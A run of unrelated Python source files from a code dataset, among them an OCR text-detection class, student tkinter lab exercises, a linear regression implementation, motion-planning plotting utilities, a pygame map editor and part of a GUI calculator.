contours, hierarchy = cv2.findContours(mask_img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
contours = sorted(contours, key=cv2.contourArea, reverse=True)
img_area = mask_img.shape[0]*mask_img.shape[1]
boxes = []
for cont in contours:
# remove boxes whose area is less than the threshold value
(x, y, w, h) = cv2.boundingRect(cont)
if w*h < img_area/200:
continue
else:
# Expand the remaining boxes (%) using the coefficients by, bx so
# that the text is guaranteed to fit in them
by = int(h*TEXT_BOX_GAP_Y/100)
bx = int(w*TEXT_BOX_GAP_X/100)
x1, x2 = abs(x - bx), (x + w + bx)
y1, y2 = abs(y - by), (y + h + by)
# We check if the coordinates x2, y2 go beyond the image and if they do,
# then the coordinates are equal to the maximum dimension of the image
if x2 > mask_img.shape[1]:
x2 = mask_img.shape[1]
if y2 > mask_img.shape[0]:
y2 = mask_img.shape[0]
new_W, new_H = (x2 - x1), (y2 - y1)
boxes.append([x1, y1, new_W, new_H])
self._boxes = self._find_largest_boxes(boxes=boxes) if len(boxes) > NUM_OF_LARGEST_BOXES else boxes
def _find_largest_boxes(self, boxes:np.array) -> list:
'''The method takes a list of all found boxes and returns the given
number (not more than: NUM_OF_LARGEST_BOXES :) of boxes with the largest area'''
boxes_array = np.array(boxes)
areas = np.prod(boxes_array[:,2:4], axis=1)
max_areas_indises = np.argpartition(areas, -NUM_OF_LARGEST_BOXES)[-NUM_OF_LARGEST_BOXES:]
bigest_boxes = [boxes_array[i].tolist() for i in max_areas_indises]
return bigest_boxes
def _crop_image(self, image:np.ndarray) -> np.ndarray:
"""The method crops the image proportionally to the crop ratio (floating point numbers from 0 to 1)
relative to the center of the image."""
x, y, h, w = 0, 0, image.shape[0], image.shape[1]
# For correct language recognition, the width is additionally multiplied by 1.5 (you can experiment)
new_w, new_h = (w*CROP_FACTOR*1.5), (h*CROP_FACTOR)
new_x, new_y = (w - new_w), (h - new_h)
cropped_img = image[int(new_y):int(new_y+new_h), int(new_x):int(new_x+new_w)]
return cropped_img
def _recognize_text(self, conf:str, image:np.ndarray) -> str:
"""Text recognition method"""
return pytesseract.image_to_string(image, config=conf)
def _detect_lang(self, text:str) -> str:
# remove all non-alphanumeric characters
cleared_text = re.sub(r'[\W_0-9]+', ' ', text)
DetectorFactory.seed = 0
alpha_2_lang = detect(cleared_text.lower())
# Convert ISO 639-3 language code format from alpha_2 to alpha_3
langdict = pycountry.languages.get(alpha_2=alpha_2_lang)
alpha_3_lang_code = langdict.alpha_3
return alpha_3_lang_code
def get_text(self, text_lang:str, crop:bool) -> list:
"""text_lang The language must be specified in alpha-3 format,
if the language is unknown, then the text_lang parameter must be set to False.
If the language is not specified, then it will be recognized automatically,
but it will take more time, since text recognition needs to be done twice.
The crop parameter is set to True if the text needs to be cropped,
and False if the block of text has already been cut from the photo.
"""
self._image_preprocessing()
font_size, num_lines = self._measure_strings()
mask_img = self._get_text_mask(self.img, font_size, num_lines)
        if crop:
            self._find_boxes(mask_img=mask_img)
        binary_images = self._get_binary_images(self.img, font_size)
        if binary_images is False:
            return False
# Loop through images prepared for OCR
for index, image in binary_images:
if text_lang == False:
# a cropped sample image is used to speed up language recognition.
sample_image = self._crop_image(image)
multilang_recog_text = self._recognize_text(TESSERACT_DEFAULT_CONFIG, sample_image)
# Detect language
recognized_lang = self._detect_lang(multilang_recog_text)
# After the exact definition of the language, we make repeated
# recognition with the exact indication of the language
custom_config = (f'-l {recognized_lang} --oem 1 --psm 6')
ocr_result = self._recognize_text(custom_config, image)
self.result.append({
'lang':recognized_lang,
'box_index':index,
'text': ocr_result
})
else:
# Recognition option if the language of the text is known
config = (f'-l {text_lang} --oem 1 --psm 6')
ocr_result = self._recognize_text(config, image)
self.result.append({
'lang': text_lang,
'box_index': index,
'text': ocr_result
})
return self.result
def draw_boxes(self, **kwargs) -> np.ndarray:
"""
Method for drawing bounding rectangles
It is intended for debugging of the module or delivery to the
user of the image with the selected text
:param index: (int) Index of the box text in the array self._boxes,
optional parameter to print one selected box.
:param max_resolution: (int) An optional parameter to scale the image
to a specified maximum measurement of height or width.
:param color: (tuple) color RGB for example (255,122,4)
:param thickness: (int) line thickness(pixels) of box
        :param base64: (bool) If True, return a dict with a base64-encoded
        image; by default an np.ndarray is returned.
"""
img = self.original
boxes = self._boxes # default value - all boxes
if 'index' in kwargs:
index = kwargs['index']
boxes = [self._boxes[index]]
line_color = (255, 0, 0) # default
if 'color' in kwargs:
line_color = kwargs['color']
line_thickness = 10 # default
if 'thickness' in kwargs:
line_thickness = kwargs['thickness']
for box in boxes:
(x,y,w,h) = box
cv2.rectangle(img, (x, y), ((x + w), (y + h)), line_color, line_thickness)
# If the maximum resolution is set, then the picture will be changed, otherwise return the original
if 'max_resolution' in kwargs:
img = self._resize_image(img, kwargs['max_resolution'])
if kwargs.get('base64') == True:
return self._encode_image(img)
return img
``` |
{
"source": "A1zak/Lab-11",
"score": 3
} |
#### File: A1zak/Lab-11/zadanie1.py
```python
import timeit
def factorial(n):
if n == 0:
return 1
elif n == 1:
return 1
else:
return n * factorial(n - 1)
def fib(n):
if n == 0 or n == 1:
return n
else:
return fib(n - 2) + fib(n - 1)
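# Note: this naive recursion is exponential; fib(30) alone triggers roughly
# 2.7 million recursive calls, which is what makes the timing measurement interesting.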
if __name__ == '__main__':
    # timeit given a string like "r_fib" only times a variable lookup; time
    # the actual recursive calls instead (number=1 runs each function once).
    fib_time = timeit.timeit(lambda: fib(30), number=1)
    factorial_time = timeit.timeit(lambda: factorial(30), number=1)
    r_fib = fib(30)
    r_factorial = factorial(30)
    print(f'Result of the recursive Fibonacci function fib(30) = {r_fib}.')
    print(f'Execution time: {fib_time} seconds.')
    print(f'Result of the recursive factorial function factorial(30) = {r_factorial}.')
    print(f'Execution time: {factorial_time} seconds.')
``` |
{
"source": "A1zak/Lb20",
"score": 4
} |
#### File: A1zak/Lb20/Task_2.py
```python
from tkinter import *
# Task: write a program matching the following description.
# Pressing Enter in a single-line text field moves its text into a list
# (a Listbox instance).
# Double-clicking (<Double-Button-1>) a line in the list copies it back into the text field.
# Add the entry text to the list
def add_item(event):
name = ent.get()
lbox.insert(0, name)
ent.delete(0, 'end')
# Move the selected items from the list into the text field
def delete_item(event):
product = []
select = list(lbox.curselection())
select.reverse()
for i in select:
op = lbox.get(i)
product.append(op)
for val in product:
ent.insert(0, val)
for k in select:
lbox.delete(k)
if __name__ == '__main__':
    # Build the GUI
    root = Tk()
    root.title('Text transfer')
    root.geometry('364x200')
    # Entry field for input
    ent = Entry(root, width=20, font=36)
    # Listbox widget
    lbox = Listbox(width=30)
    # Lay out the widgets
    ent.grid(row=1, column=1)
    lbox.grid(row=2, column=1, pady=5)
    # Event bindings
    ent.bind('<Return>', add_item)
    lbox.bind('<Double-Button-1>', delete_item)
    # Start the event loop
root.mainloop()
``` |
{
"source": "A1zak/Lb21",
"score": 3
} |
#### File: A1zak/Lb21/Task3.py
```python
from tkinter import *
from tkinter import filedialog as fd
from tkinter import messagebox as mb
# In the program from the lab, the askopenfilename and asksaveasfilename
# functions raise exceptions if their dialogs are closed without choosing
# or entering a file name. Write code that handles these exceptions: the
# user should see an information dialog saying the file was not loaded or
# not saved. Also add a "Clear" button that deletes the text from the field;
# before deletion the user must confirm the action in a dialog box.
def del_text():
    answer = mb.askokcancel('Delete text',
                            'Really delete the text?')
if answer:
text.delete(1.0, END)
def insert_text():
file_name = fd.askopenfilename()
try:
f = open(file_name)
except (FileNotFoundError, TypeError):
mb.showinfo("Открытие файла",
"Файл не выбран!")
else:
s = f.read()
text.insert(1.0, s)
f.close()
def extract_text():
file_name = fd.asksaveasfilename()
try:
f = open(file_name, 'w')
except (FileNotFoundError, TypeError):
mb.showinfo("Сохранение файла",
"Файл не сохранен!")
else:
s = text.get(1.0, END)
f.write(s)
f.close()
root = Tk()
b3 = Button(text="Очистить", command=del_text)
b3.grid(column=1, sticky=E)
text = Text(width=50, height=25)
text.grid(row=1, columnspan=2)
b1 = Button(text="Открыть", command=insert_text)
b1.grid(row=2, sticky=E)
b2 = Button(text="Сохранить", command=extract_text)
b2.grid(row=2, column=1, sticky=W)
root.mainloop()
``` |
{
"source": "a20r/Dodger",
"score": 3
} |
#### File: Dodger/analysis/table.py
```python
import csv
import numpy as np
class Table(object):
def __init__(self, headers):
self.data = dict()
self.rows = list()
self.headers = map(lambda val: val.strip(), headers)
self.index_data = dict()
for header in self.headers:
self.data[header] = list()
self.index_data[header] = dict()
def get_headers(self):
return self.headers
def plot(self, h_x, h_y, plt, **kwargs):
plt.scatter(self(h_x), self(h_y), **kwargs)
plt.xlabel(h_x)
plt.ylabel(h_y)
def plot_func(self, h_x, h_y, func, plt, label=""):
xs = np.linspace(min(self(h_x)), max(self(h_x)), 1000)
ys = func(xs)
plt.plot(xs, ys, lw=3, label=label)
plt.xlabel(h_x)
plt.ylabel(h_y)
def splice(self, headers):
ret_dict = dict()
for header in headers:
ret_dict[header] = self.data[header]
return ret_dict
def to_matrix(self, *headers):
mat = [list() for _ in xrange(len(self.rows))]
for header in headers:
for j, datum in enumerate(self.data[header]):
mat[j].append(datum)
return mat
def try_conv(self, elem):
try:
return float(elem)
except ValueError:
if elem == "NA":
raise ValueError()
else:
return elem
def get_num_rows(self):
return len(self.rows)
def add_row(self, row):
try:
row = map(self.try_conv, row)
except ValueError:
return self
self.rows.append(row)
for i, elem in enumerate(row):
self.data[self.headers[i]].append(elem)
if not elem in self.index_data[self.headers[i]].keys():
self.index_data[self.headers[i]][elem] = dict()
for header in self.headers:
self.index_data[self.headers[i]][elem][header] = list()
for j, inner_elem in enumerate(row):
self.index_data[self.headers[i]][elem][self.headers[j]]\
.append(inner_elem)
return self
def get_row(self, i):
return self.rows[i]
def __getitem__(self, index):
ret_dict = dict()
for i, header in enumerate(self.headers):
ret_dict[header] = self.rows[index][i]
return ret_dict
def __call__(self, index, value=None, s_index=None):
        if value is not None:
            if s_index is not None:
return self.index_data[index][value][s_index]
else:
return self.index_data[index][value]
else:
return self.data[index]
def load_csv(csv_filename):
tab = None
with open(csv_filename) as f:
reader = csv.reader(f)
for i, row in enumerate(reader):
if i == 0:
tab = Table(row)
else:
tab.add_row(row)
return tab
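# A minimal usage sketch (assumes a hypothetical "results.csv" whose first row
# names the columns, e.g. "time" and "cost"):
#
#   tab = load_csv("results.csv")
#   print(tab.get_headers(), tab.get_num_rows())
#   costs = tab("cost")               # the full "cost" column
#   fast = tab("time", 1.0, "cost")   # "cost" values of rows where time == 1.0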
```
#### File: Dodger/scripts/drawer.py
```python
__all__ = ["Axes3D"]
import matplotlib.pyplot as plt
import warnings
import path
from mpl_toolkits.mplot3d import Axes3D
class Drawer(object):
def __init__(self, fig, ax):
warnings.filterwarnings("ignore")
self.fig = fig
self.ax = ax
def clear(self):
self.fig = plt.figure()
self.ax = self.fig.add_subplot(111, projection="3d")
return self
def get_xs_ys_ts(self, node_list):
xs = list()
ys = list()
ts = list()
for stp in node_list:
xs.append(stp.x)
ys.append(stp.y)
ts.append(stp.t)
return xs, ys, ts
def get_xs_ys(self, node_list):
xs = list()
ys = list()
for stp in node_list:
xs.append(stp.x)
ys.append(stp.y)
return xs, ys
def draw_temporal_nodes(self, rm):
xs, ys, ts = self.get_xs_ys_ts(rm.nodes())
self.ax.scatter(xs, ys, ts, alpha=0.5)
return self
def draw_nodes(self, rm):
xs, ys = self.get_xs_ys(rm.nodes())
self.ax.scatter(xs, ys, alpha=0.5)
return self
def draw_edges(self, rm):
for s_n, e_n in rm.edges():
self.ax.plot([s_n.x, e_n.x], [s_n.y, e_n.y])
return self
def draw_path(self, path):
xs, ys, ts = self.get_xs_ys_ts(path)
for i, s_n in enumerate(path[:-1]):
e_n = path[i + 1]
self.ax.plot([s_n.x, e_n.x], [s_n.y, e_n.y], [s_n.t, e_n.t],
"ro:", linewidth=2)
return self
def draw_agent(self, ag, t_m):
num_samples = int(t_m * 10)
t_step = t_m / num_samples
xs = list()
ys = list()
ts = list()
        for i in range(num_samples):
t = i * t_step
if type(ag) == path.Path:
ag_pt = ag(t)
else:
ag_pt = ag.get_position(t)
xs.append(ag_pt.x)
ys.append(ag_pt.y)
ts.append(t)
self.ax.plot(xs, ys, ts, "y-", linewidth=2)
return self
def show(self):
self.ax.set_xlabel("X")
self.ax.set_ylabel("Y")
self.ax.set_zlabel("Time")
plt.show()
return self
def make(fig, ax):
    return Drawer(fig, ax)
```
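`Drawer` only needs node-like objects exposing `x`, `y`, and `t`; a small sketch with a stand-in namedtuple (the `STP` type here is invented for illustration):
```python
# Sketch only: STP stands in for the repo's space-time point type.
from collections import namedtuple
import matplotlib.pyplot as plt

STP = namedtuple("STP", ["x", "y", "t"])

fig = plt.figure()
ax = fig.add_subplot(111, projection="3d")
drawer = Drawer(fig, ax)

# a toy space-time path: three waypoints at increasing times
drawer.draw_path([STP(0, 0, 0), STP(1, 2, 1), STP(3, 3, 2)])
drawer.show()
```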
#### File: Dodger/scripts/map_generator.py
```python
import pygame
import sys
OBSTACLE_COLOR = (255, 0, 0)
BACKGROUND_COLOR = (200, 200, 200)
GOAL_COLOR = (255, 0, 255)
START_COLOR = (0, 0, 255)
ROBOT_COLOR = (0, 0, 255)
def draw_circle(screen, point, is_goal):
if is_goal:
pygame.draw.circle(screen, GOAL_COLOR, point, 30, 3)
else:
pygame.draw.circle(screen, START_COLOR, point, 30, 3)
def draw_polygon(screen, point_list, color, currently_working):
if len(point_list) == 1:
pygame.draw.circle(screen, color, point_list[0], 3)
elif len(point_list) == 2:
pygame.draw.line(screen, color, point_list[0], point_list[1], 3)
elif len(point_list) == 0:
return
else:
if currently_working:
pygame.draw.lines(screen, color, False, point_list, 3)
else:
pygame.draw.polygon(screen, color, point_list)
def start(width, height, filename):
pygame.display.init()
screen = pygame.display.set_mode((width, height))
screen.fill(BACKGROUND_COLOR)
done = False
obstacle_list = list()
current_obstacle = list()
robot = list()
start_point = [0, 0]
end_point = [width, height]
editing_obstacles = True
while not done:
screen.fill(BACKGROUND_COLOR)
for obstacle in obstacle_list:
draw_polygon(screen, obstacle, OBSTACLE_COLOR, False)
draw_circle(screen, start_point, False)
draw_circle(screen, end_point, True)
draw_polygon(screen, current_obstacle, OBSTACLE_COLOR,
editing_obstacles)
draw_polygon(screen, robot, ROBOT_COLOR, not editing_obstacles)
event_list = pygame.event.get()
for event in event_list:
if event.type == pygame.MOUSEBUTTONUP:
pos = pygame.mouse.get_pos()
if pygame.key.get_pressed()[pygame.K_s]:
start_point = pos
elif pygame.key.get_pressed()[pygame.K_g]:
end_point = pos
elif not editing_obstacles:
robot.append(pos)
elif editing_obstacles:
current_obstacle.append(pos)
elif event.type == pygame.KEYUP:
if event.key == pygame.K_e:
obstacle_list.append(current_obstacle)
current_obstacle = list()
elif event.key == pygame.K_w:
pygame.display.set_caption("Writing to " + filename)
to_cpp(
width, height,
obstacle_list,
robot,
start_point,
end_point,
filename
)
elif event.key == pygame.K_o:
editing_obstacles = True
elif event.key == pygame.K_r:
editing_obstacles = False
elif event.type == pygame.QUIT:
to_cpp(
width, height,
obstacle_list,
robot,
start_point,
end_point,
filename)
                sys.exit()
pygame.display.flip()
def to_cpp(width, height, obstacle_list, robot, start_pos, goal_pos, filename):
with open(filename, "w") as f:
f.write("#include <vector>\n")
f.write("using namespace std;\n")
f.write("class ObstaclesInstance {};\n")
if __name__ == "__main__":
if len(sys.argv) == 4:
start(int(sys.argv[1]), int(sys.argv[2]), sys.argv[3])
else:
raise Exception("Not enough command line arguments given")
```
#### File: Dodger/scripts/path.py
```python
import point
class Path(list):
def get_max_time(self):
return self[-1].t
def __call__(self, t, index=False):
for i, p in enumerate(self):
if i == 0:
continue
if t <= p.get_t():
t_diff = p.t - self[i - 1].t
if t_diff == 0:
continue
rel_t = float(t) - self[i - 1].t
x_vel = (p.x - self[i - 1].x) / t_diff
y_vel = (p.y - self[i - 1].y) / t_diff
x_pos = self[i - 1].x + rel_t * x_vel
y_pos = self[i - 1].y + rel_t * y_vel
if index:
return point.Point(x_pos, y_pos), i
else:
return point.Point(x_pos, y_pos)
if index:
return point.Point(self[-1].x, self[-1].y), len(self) - 1
else:
return point.Point(self[-1].x, self[-1].y)
def make(*args):
return Path(*args)
``` |
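`Path.__call__` linearly interpolates between timestamped waypoints. A small sketch, assuming the repo's `point` module is importable; `Waypoint` below is a hypothetical stand-in with the attributes the class reads (`x`, `y`, `t`, and a `get_t()` accessor):
```python
# Waypoint is hypothetical; Path only needs x, y, t and get_t().
class Waypoint:
    def __init__(self, x, y, t):
        self.x, self.y, self.t = x, y, t
    def get_t(self):
        return self.t

p = Path([Waypoint(0, 0, 0.0), Waypoint(10, 0, 5.0)])
print(p.get_max_time())  # 5.0
mid = p(2.5)             # point.Point halfway along: x=5.0, y=0.0
print(mid.x, mid.y)
```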
{
"source": "a22057916w/General-ML",
"score": 4
} |
#### File: General-ML/linear_regression/imp.py
```python
import numpy as np
class LinearRegression():
def __init__(self, num_iteration=100, learning_rate=1e-1, feature_scaling=True):
self.num_iteration = num_iteration
self.learning_rate = learning_rate
self.feature_scaling = feature_scaling
self.M = 0 # normalize mean
self.S = 1 # normalize range
self.W = None
self.cost_history = np.empty(num_iteration)
def fit(self, X, y):
        # m is the number of samples, n the number of features
if X.ndim == 1:
X = X.reshape(X.shape[0], 1)
m, n = X.shape
        # optionally apply feature scaling
if self.feature_scaling:
X = self.normalize(X)
        # prepend a column of ones to X for the intercept term theta_0
X = np.hstack((np.ones((m, 1)), X))
y = y.reshape(y.shape[0], 1)
self.W = np.zeros((n+1,1))
        # update the parameters step by step on each iteration
for i in range(self.num_iteration):
y_hat = X.dot(self.W)
cost = self.cost_function(y_hat, y, m)
self.cost_history[i] = cost
self.gradient_descent(X, y_hat, y, m)
def normalize(self, X):
self.M = np.mean(X, axis=0)
self.S = np.max(X, axis=0) - np.min(X, axis=0)
return (X - self.M) / self.S
def cost_function(self, y_hat, y, m):
return 1/(2*m) * np.sum((y_hat - y)**2)
def compute_gradient(self, X, y_hat, y, m):
return 1/m * np.sum((y_hat - y) * X, axis=0).reshape(-1,1)
def gradient_descent(self, X, y_hat, y, m):
self.W -= self.learning_rate * self.compute_gradient(X, y_hat, y, m)
def predict(self, X):
if X.ndim == 1:
X = X.reshape(X.shape[0], 1)
m, n = X.shape
        if self.feature_scaling:  # was "if self.normalize:", a bound method that is always truthy
X = (X - self.M) / self.S
X = np.hstack((np.ones((m, 1)), X))
y_hat = X.dot(self.W)
return y_hat
def normal_equation(self, X, y):
if X.ndim == 1:
X = X.reshape(X.shape[0], 1)
m, n = X.shape
X = np.hstack((np.ones((m, 1)), X))
y = y.reshape(y.shape[0], 1)
self.W = np.linalg.inv(X.T.dot(X)).dot(X.T).dot(y)
``` |
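A quick fit/predict sketch on synthetic data (the data and hyperparameters below are made up for illustration):
```python
# Synthetic 1-D regression: y = 3x + 4 plus noise.
import numpy as np

rng = np.random.default_rng(0)
X = rng.uniform(0, 10, size=100)
y = 3 * X + 4 + rng.normal(0, 0.5, size=100)

model = LinearRegression(num_iteration=500, learning_rate=0.1)
model.fit(X, y)
print(model.predict(np.array([0.0, 1.0, 2.0])).ravel())  # ~ [4, 7, 10]

# Closed-form fit for comparison: W should be roughly [4, 3].
exact = LinearRegression(feature_scaling=False)
exact.normal_equation(X, y)
print(exact.W.ravel())
```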
{
"source": "a22057916w/python_advance",
"score": 3
} |
#### File: python_advance/adv_cal/cal_v3.py
```python
import tkinter as tk
from tkinter import messagebox
import re
import math
import os
from time import strftime, localtime
import codecs  # log output encoding for Windows
# ------------------ log function ---------------------
def printLog(strLogMsg):
print(strLogMsg)
fileLog = codecs.open("./cal_v3.log", 'a', "utf-8")
fileLog.write("[%s]%s\n" % (getDateTimeFormat(), strLogMsg))
fileLog.close()
def getDateTimeFormat():
strDateTime = "%s" % (strftime("%Y/%m/%d %H:%M:%S", localtime()))
return strDateTime
class Calculator():
def __init__(self):
printLog("[I][__init__] Iniiating the Calculator")
self.window = tk.Tk()
self.window.title("Calculator")
self.window.geometry("800x400") # set window size
self.window.resizable(0, 0) # set window fixed
        # let the grid columns and rows scale with the window; grid size: 4x6
for i in range(5):
self.window.columnconfigure(i, weight=1)
for i in range(6):
self.window.rowconfigure(i, weight=1)
        # once a StringVar is bound to a Tkinter widget, modifying the StringVar makes Tkinter update the widget automatically
self.strEqua = tk.StringVar()
        # holds the expression string, which is then set into strEqua
self.strExpr = "0"
self.strEqua.set(self.strExpr)
self.bEvaluated = False
        # use an Entry widget to display the computed value
self.entResult = tk.Entry(self.window, textvariable=self.strEqua, state=tk.DISABLED, justify="right") # "state=tk.DISABLED" will not allow user to input, "justify="right"" aligns the text to the right
self.entResult.config(disabledbackground=self.window["bg"], font=12) # set disabledbackground colour
self.entResult.grid(row = 0, column = 0, columnspan=5, ipadx=70, sticky=tk.NW+tk.SE)
        # -------- setup number buttons ---------
self.btnZero = tk.Button(self.window, width=20, text="0", font=12, command=lambda:self.pressNum("0"))
self.btnZero.grid(row=5, column=0, columnspan=2, sticky=tk.NW+tk.SE)
self.btnOne = tk.Button(self.window, width=20, text="1", font=12, command=lambda:self.pressNum("1"))
self.btnOne.grid(row=4, column=0, sticky=tk.NW+tk.SE)
self.btnTwo = tk.Button(self.window, width=20, text="2", font=12, command=lambda:self.pressNum("2"))
self.btnTwo.grid(row=4, column=1, sticky=tk.NW+tk.SE)
self.btnThree = tk.Button(self.window, width=20, text="3", font=12, command=lambda:self.pressNum("3"))
self.btnThree.grid(row=4, column=2, sticky=tk.NW+tk.SE)
self.btnFour = tk.Button(self.window, width=20, text="4", font=12, command=lambda:self.pressNum("4"))
self.btnFour.grid(row=3, column=0, sticky=tk.NW+tk.SE)
self.btnFive = tk.Button(self.window, width=20, text="5", font=12, command=lambda:self.pressNum("5"))
self.btnFive.grid(row=3, column=1, sticky=tk.NW+tk.SE)
self.btnSix = tk.Button(self.window, width=20, text="6", font=12, command=lambda:self.pressNum("6"))
self.btnSix.grid(row=3, column=2, sticky=tk.NW+tk.SE)
self.btnSeven = tk.Button(self.window, width=20, text="7", font=12, command=lambda:self.pressNum("7"))
self.btnSeven.grid(row=2, column=0, sticky=tk.NW+tk.SE)
self.btnEight = tk.Button(self.window, width=20, text="8", font=12, command=lambda:self.pressNum("8"))
self.btnEight.grid(row=2, column=1, sticky=tk.NW+tk.SE)
self.btnNine = tk.Button(self.window, width=20, text="9", font=12, command=lambda:self.pressNum("9"))
self.btnNine.grid(row=2, column=2, sticky=tk.NW+tk.SE)
        # -------- setup arithmetic operator buttons ---------
self.btnAdd = tk.Button(self.window, width=20, text="+", font=12, command=lambda:self.pressArithm("+"))
self.btnAdd.grid(row=5, column=3, sticky=tk.NW+tk.SE)
self.btnSub = tk.Button(self.window, width=20, text="-", font=12, command=lambda:self.pressArithm("-"))
self.btnSub.grid(row=4, column=3, sticky=tk.NW+tk.SE)
self.btnMult = tk.Button(self.window, width=20, text="*", font=12, command=lambda:self.pressArithm("*"))
self.btnMult.grid(row=3, column=3, sticky=tk.NW+tk.SE)
self.btnDiv = tk.Button(self.window, width=20, text="/", font=12, command=lambda:self.pressArithm("/"))
self.btnDiv.grid(row=2, column=3, sticky=tk.NW+tk.SE)
        self.btnMod = tk.Button(self.window, width=20, text="%", font=12, command=lambda:self.pressArithm("%"))
self.btnMod.grid(row=1, column=3, sticky=tk.NW+tk.SE)
# ------- setup special operation buttons ---------
self.btnRoot = tk.Button(self.window, width=20, text="\u221A", font=12, command=lambda:self.pressRoot())
self.btnRoot.grid(row=1, column=4, sticky=tk.NW+tk.SE)
self.btnSquare = tk.Button(self.window, width=20, text="x\u00B2", font=12, command=lambda:self.pressSquare())
self.btnSquare.grid(row=2, column=4, sticky=tk.NW+tk.SE)
self.btnCube = tk.Button(self.window, width=20, text="x\u00B3", font=12, command=lambda:self.pressCube())
self.btnCube.grid(row=3, column=4, sticky=tk.NW+tk.SE)
self.btnFact = tk.Button(self.window, width=20, text="n!", font=12, command=lambda:self.pressFact())
self.btnFact.grid(row=4, column=4, sticky=tk.NW+tk.SE)
# -------- setup buttons of other operations ---------
self.btnEqu = tk.Button(self.window, width=20, text="=", font=12, command=lambda:self.pressEqu(""))
self.btnEqu.grid(row=5, column=4, sticky=tk.NW+tk.SE)
self.btnDec = tk.Button(self.window, width=20, text=".", font=12, command=lambda:self.pressDec())
self.btnDec.grid(row=5, column=2, sticky=tk.NW+tk.SE)
self.btnClear = tk.Button(self.window, width=20, text="AC", font=12, command=lambda:self.pressClear())
self.btnClear.grid(row=1, column=0, sticky=tk.NW+tk.SE)
self.btnMinus = tk.Button(self.window, width=20, text="+/-", font=12, command=lambda:self.pressMinus())
self.btnMinus.grid(row=1, column=2, sticky=tk.NW+tk.SE)
self.btnErase = tk.Button(self.window, width=20, text="\u232B", font=12, command=lambda:self.pressErase())
self.btnErase.grid(row=1, column=1, sticky=tk.NW+tk.SE)
# ------------------ method of button events -------------------------
# handling the button events of numbers
def pressNum(self, strNum):
printLog("[I][pressNum] The button %s has been pressed" % strNum)
        # if the expression has been evaluated, reset the expression to strNum
if self.bEvaluated:
self.strExpr = strNum
self.strEqua.set(self.strExpr)
self.bEvaluated = False
return
# if the expression is single digit
if len(self.strExpr) < 2:
# if the expression is 0, simply change it to strNum
if self.strExpr == "0":
self.strExpr = strNum
            # else, concatenate strNum onto the expression
else:
self.strExpr += strNum
# if the length of expression >= 2
else:
            # disallow forms like 3+02; replace the leading 0 so it becomes 3+2
if self.hasOp(self.strExpr[-2]) and self.strExpr[-1] == "0":
self.strExpr = self.strExpr[:-1] + strNum
            # otherwise concatenate the pressed digit onto the expression
else:
self.strExpr += strNum
self.strEqua.set(self.strExpr)
    # handling the arithmetic buttons
def pressArithm(self, strOp):
printLog("[I][pressArithm] The button %s has been pressed" % strOp)
# if the last char is op or ".", repalace with strOp
if self.hasOp(self.strExpr[-1]) or self.strExpr[-1] == ".":
self.strExpr = self.strExpr[:-1] + strOp
# if the op is in the expression and not in the last pos, do calculation
elif self.hasOp(self.strExpr):
self.pressEqu("pressArithm")
self.strExpr += strOp
        # otherwise concatenate the arithmetic operator onto the expression
else:
self.strExpr += strOp
self.strEqua.set(self.strExpr)
# There must be an operator in the expression after the action
# Therefore, there must be an evaluation after
self.bEvaluated = False
def pressRoot(self):
printLog("[I][pressRoot] The button \u221A has been pressed")
try:
# if the last char is op, remove it
if self.hasOp(self.strExpr[-1]):
self.strExpr = self.strExpr[:-1]
            # split the expression by ops; for example, 123+4 becomes [123, 4].
            # Then take the last number (4) and calculate
strLast = re.split(r'\+|-|\*|\/|%', self.strExpr)[-1]
strVal = str(math.sqrt(eval(strLast)))
self.strExpr = self.strExpr[:-len(strLast)] + strVal
self.strEqua.set(self.strExpr)
self.bEvaluated = True
except OverflowError as e:
printLog("[W][pressRoot] The \u221A operation will go overflow")
messagebox.showinfo("Error", e)
self.strExpr = "0"
self.strEqua.set(self.strExpr)
self.bEvaluated = True
except Exception as e:
printLog("[E][pressRoot] Unexpected Error: " + e)
def pressSquare(self):
printLog("[I][pressSquare] The button x\u00B2 has been pressed")
if self.isTooLarge():
printLog("[W][pressSquare] The number is out of limit")
messagebox.showinfo("Warning", "Inf")
self.strExpr = "0"
else:
# if the last char is op, remove it
if self.hasOp(self.strExpr[-1]):
self.strExpr = self.strExpr[:-1]
strLast = re.split(r'\+|-|\*|\/|%', self.strExpr)[-1]
strVal = str(eval(strLast)**2)
self.strExpr = self.strExpr[:-len(strLast)] + strVal
self.strEqua.set(self.strExpr)
self.bEvaluated = True
def pressCube(self):
printLog("[I][pressCube] The button x\u00B3 has been pressed")
if self.isTooLarge():
printLog("[W][pressCube] The number is out of limit")
messagebox.showinfo("Warning", "Inf")
self.strExpr = "0"
else:
# if the last char is op, remove it
if self.hasOp(self.strExpr[-1]):
self.strExpr = self.strExpr[:-1]
strLast = re.split(r'\+|-|\*|\/|%', self.strExpr)[-1]
strVal = str(eval(strLast)**3)
self.strExpr = self.strExpr[:-len(strLast)] + strVal
self.strEqua.set(self.strExpr)
self.bEvaluated = True
def pressFact(self):
printLog("[I][pressFact] The button n! has been pressed")
try:
# if the last char is op, remove it
if self.hasOp(self.strExpr[-1]):
self.strExpr = self.strExpr[:-1]
strLast = re.split(r'\+|-|\*|\/|%', self.strExpr)[-1]
# if the value > 100,000, return to default value
if eval(strLast) > 1E5:
printLog("[W][pressFact] The factorial number is out of limit")
messagebox.showinfo("Error", "The factorial number is out of limit")
self.strExpr = "0"
else:
strVal = str(math.factorial(eval(strLast)))
self.strExpr = self.strExpr[:-len(strLast)] + strVal
self.strEqua.set(self.strExpr)
self.bEvaluated = True
except ValueError as e:
printLog("[W][pressFact] The factorial number is out of limit")
messagebox.showinfo("Error", e)
self.strExpr = "0"
self.strEqua.set(self.strExpr)
self.bEvaluated = True
except Exception as e:
printLog("[E][pressFact] Unexpected Error: " + e)
#print(e)
def pressEqu(self, strCaller):
# check caller, "" for user press; ohterwise for called by function
if strCaller == "":
printLog("[I][pressEqu] The button = has been pressed")
else:
printLog("[I][pressEqu] PressEqu has been called by %s" % strCaller)
try:
# evaluate the expression
self.strExpr = str(eval(self.strExpr))
self.strEqua.set(self.strExpr)
self.bEvaluated = True
except ZeroDivisionError:
printLog("[W][pressEqu] Action involves zero division")
messagebox.showinfo("Error", "Can not divide by zero") # tkinter.messagebox
self.strExpr = "0"
self.strEqua.set(self.strExpr)
self.bEvaluated = True
# deal with invalid expression such as 8*(*(*(, then return default value
except SyntaxError:
printLog("[W][pressEqu] The expression is incomplete")
self.strExpr = "0"
self.strEqua.set(self.strExpr)
self.bEvaluated = True
except Exception as e:
printLog("[E][pressEqu] Unexpected Error: " + e)
#print("Unexpected Error: " + e)
def pressDec(self):
printLog("[I][pressDec] The button . has been pressed")
